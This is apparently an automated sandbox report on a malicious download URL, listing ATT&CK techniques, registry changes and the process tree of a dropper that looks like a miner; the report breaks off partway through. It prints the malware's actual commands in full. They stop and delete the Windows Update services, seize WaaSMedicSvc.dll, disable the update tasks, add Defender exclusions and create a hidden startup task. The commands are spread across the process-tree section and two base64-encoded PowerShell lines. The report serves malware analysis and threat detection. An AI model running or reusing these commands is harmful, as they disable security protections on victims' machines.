hxxp://81[.]161[.]229[.]110/htdocs/

General

Target

http://81.161.229.110/htdocs/

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

EdEYMrpFBNbTRHo.exe

pid process

2204 EdEYMrpFBNbTRHo.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

3580 takeown.exe
4632 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2204	EdEYMrpFBNbTRHo.exe

pid	process
3580	takeown.exe
4632	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EdEYMrpFBNbTRHo.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	EdEYMrpFBNbTRHo.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3580 takeown.exe
4632 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

EdEYMrpFBNbTRHo.exe

description pid process target process

PID 2204 set thread context of 4676 2204 EdEYMrpFBNbTRHo.exe conhost.exe

pid	process
3580	takeown.exe
4632	icacls.exe

flow	ioc
18	ip-api.com

description	pid	process	target process
PID 2204 set thread context of 4676	2204	EdEYMrpFBNbTRHo.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

832 sc.exe
3452 sc.exe
3536 sc.exe
3344 sc.exe
3524 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
832	sc.exe
3452	sc.exe
3536	sc.exe
3344	sc.exe
3524	sc.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 89be75672cbed801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B64FFB80-2AFA-11ED-A0EE-4A7057C3C021} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2329031507"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30981895"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d79060000000002000000000010660000000100002000000013ede67e477b554dc749a1a03bcddf634c7539a2210afa14fbfddfc474f823cf000000000e8000000002000020000000b08374667bdeac3730a944c39432e146573a967e3d3beb1000fdc9e8e9075af32000000046479f02a9fb9243e8856ff1191f48b4792ba2c908f92296cca66bc25670806f400000005119b0eb616ea9191d521f452aa038f48d21a15988fcd78eb74a4a4986e36bd5843727fffbf2719b9603a72db3f6cbbc0339339072b13ac2ef57978169519ec2	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60442d8d07bfd801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2329031507"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{6668BE0E-CE96-48F3-BEB9-6436C4BE9CC5}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30981895"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2348875470"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000001a1ab193588f143fddd6c4194ae49f975a56a97cb63c2cdaba1dd70b3f7f647c000000000e8000000002000020000000be79589336b39d2f0d068d0629be929d52d32b9b9e4262f244002733dafaae7f200000004ac2a04c67c0460571ab87e7239c5c6698816d2aed9a6a651f8b7549bbaa33d6400000001f33e9af1592c3cda83da4f7c1c09a0941299603107e10db758fb747dc671a2748505261e10e10912d1603edcaa62e97e6149457eaf7b8e9ff619470836c5c8a	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30981895"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3057408d07bfd801	iexplore.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1380 reg.exe
2860 reg.exe
1752 reg.exe
4152 reg.exe
376 reg.exe
3896 reg.exe
5028 reg.exe
4304 reg.exe
2304 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeEdEYMrpFBNbTRHo.exepowershell.exe

pid process

3108 powershell.exe
3108 powershell.exe
2204 EdEYMrpFBNbTRHo.exe
2508 powershell.exe

pid	process
1380	reg.exe
2860	reg.exe
1752	reg.exe
4152	reg.exe
376	reg.exe
3896	reg.exe
5028	reg.exe
4304	reg.exe
2304	reg.exe

pid	process
3108	powershell.exe
3108	powershell.exe
2204	EdEYMrpFBNbTRHo.exe
2508	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exeEdEYMrpFBNbTRHo.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	2204	EdEYMrpFBNbTRHo.exe
Token: SeShutdownPrivilege	3696	powercfg.exe
Token: SeCreatePagefilePrivilege	3696	powercfg.exe
Token: SeShutdownPrivilege	3720	powercfg.exe
Token: SeCreatePagefilePrivilege	3720	powercfg.exe
Token: SeShutdownPrivilege	4928	powercfg.exe
Token: SeCreatePagefilePrivilege	4928	powercfg.exe
Token: SeShutdownPrivilege	1360	powercfg.exe
Token: SeCreatePagefilePrivilege	1360	powercfg.exe
Token: SeTakeOwnershipPrivilege	3580	takeown.exe
Token: SeDebugPrivilege	2508	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

3456 iexplore.exe
3456 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

3456 iexplore.exe
3456 iexplore.exe
5024 IEXPLORE.EXE
5024 IEXPLORE.EXE
5024 IEXPLORE.EXE
5024 IEXPLORE.EXE

pid	process
3456	iexplore.exe
3456	iexplore.exe

pid	process
3456	iexplore.exe
3456	iexplore.exe
5024	IEXPLORE.EXE
5024	IEXPLORE.EXE
5024	IEXPLORE.EXE
5024	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exeEdEYMrpFBNbTRHo.execmd.execmd.exe

description	pid	process	target process
PID 3456 wrote to memory of 5024	3456	iexplore.exe	IEXPLORE.EXE
PID 3456 wrote to memory of 5024	3456	iexplore.exe	IEXPLORE.EXE
PID 3456 wrote to memory of 5024	3456	iexplore.exe	IEXPLORE.EXE
PID 3456 wrote to memory of 2204	3456	iexplore.exe	EdEYMrpFBNbTRHo.exe
PID 3456 wrote to memory of 2204	3456	iexplore.exe	EdEYMrpFBNbTRHo.exe
PID 2204 wrote to memory of 3108	2204	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 2204 wrote to memory of 3108	2204	EdEYMrpFBNbTRHo.exe	powershell.exe
PID 2204 wrote to memory of 4272	2204	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 2204 wrote to memory of 4272	2204	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 2204 wrote to memory of 4260	2204	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 2204 wrote to memory of 4260	2204	EdEYMrpFBNbTRHo.exe	cmd.exe
PID 4272 wrote to memory of 832	4272	cmd.exe	sc.exe
PID 4272 wrote to memory of 832	4272	cmd.exe	sc.exe
PID 4260 wrote to memory of 3696	4260	cmd.exe	powercfg.exe
PID 4260 wrote to memory of 3696	4260	cmd.exe	powercfg.exe
PID 4272 wrote to memory of 3452	4272	cmd.exe	sc.exe
PID 4272 wrote to memory of 3452	4272	cmd.exe	sc.exe
PID 4272 wrote to memory of 3536	4272	cmd.exe	sc.exe
PID 4272 wrote to memory of 3536	4272	cmd.exe	sc.exe
PID 4260 wrote to memory of 3720	4260	cmd.exe	powercfg.exe
PID 4260 wrote to memory of 3720	4260	cmd.exe	powercfg.exe
PID 4272 wrote to memory of 3344	4272	cmd.exe	sc.exe
PID 4272 wrote to memory of 3344	4272	cmd.exe	sc.exe
PID 4260 wrote to memory of 4928	4260	cmd.exe	powercfg.exe
PID 4260 wrote to memory of 4928	4260	cmd.exe	powercfg.exe
PID 4272 wrote to memory of 3524	4272	cmd.exe	sc.exe
PID 4272 wrote to memory of 3524	4272	cmd.exe	sc.exe
PID 4260 wrote to memory of 1360	4260	cmd.exe	powercfg.exe
PID 4260 wrote to memory of 1360	4260	cmd.exe	powercfg.exe
PID 4272 wrote to memory of 1380	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 1380	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 4152	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 4152	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 2860	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 2860	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 376	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 376	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 3896	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 3896	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 3580	4272	cmd.exe	takeown.exe
PID 4272 wrote to memory of 3580	4272	cmd.exe	takeown.exe
PID 4272 wrote to memory of 4632	4272	cmd.exe	icacls.exe
PID 4272 wrote to memory of 4632	4272	cmd.exe	icacls.exe
PID 4272 wrote to memory of 5028	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 5028	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 4304	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 4304	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 1752	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 1752	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 2304	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 2304	4272	cmd.exe	reg.exe
PID 4272 wrote to memory of 1060	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 1060	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 2256	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 2256	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 5100	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 5100	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 3844	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 3844	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 4328	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 4328	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 3688	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 3688	4272	cmd.exe	schtasks.exe
PID 4272 wrote to memory of 4784	4272	cmd.exe	schtasks.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://81.161.229.110/htdocs/
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3456

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3456 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5024

C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe
"C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:832

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:3452

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3536

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3344

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:3524

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1380

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4152

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:2860

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:376

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:3896

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4632

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5028

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4304

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1752

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2304

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1060

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2256

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:5100

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:3844

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:4328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3688

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbQB5AHcAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBVAEEAYwB3AEIAcwBBAEMATQBBAFAAZwBBAGcAQQBGAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEYAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEASQBBAEEAdABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBBAGcAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEIAYwBBAEUAYwBBAGIAdwBCAHYAQQBHAGMAQQBiAEEAQgBsAEEARgB3AEEAUQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgB4AEEARwBVAEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAGYAcgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGMAawBrACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAH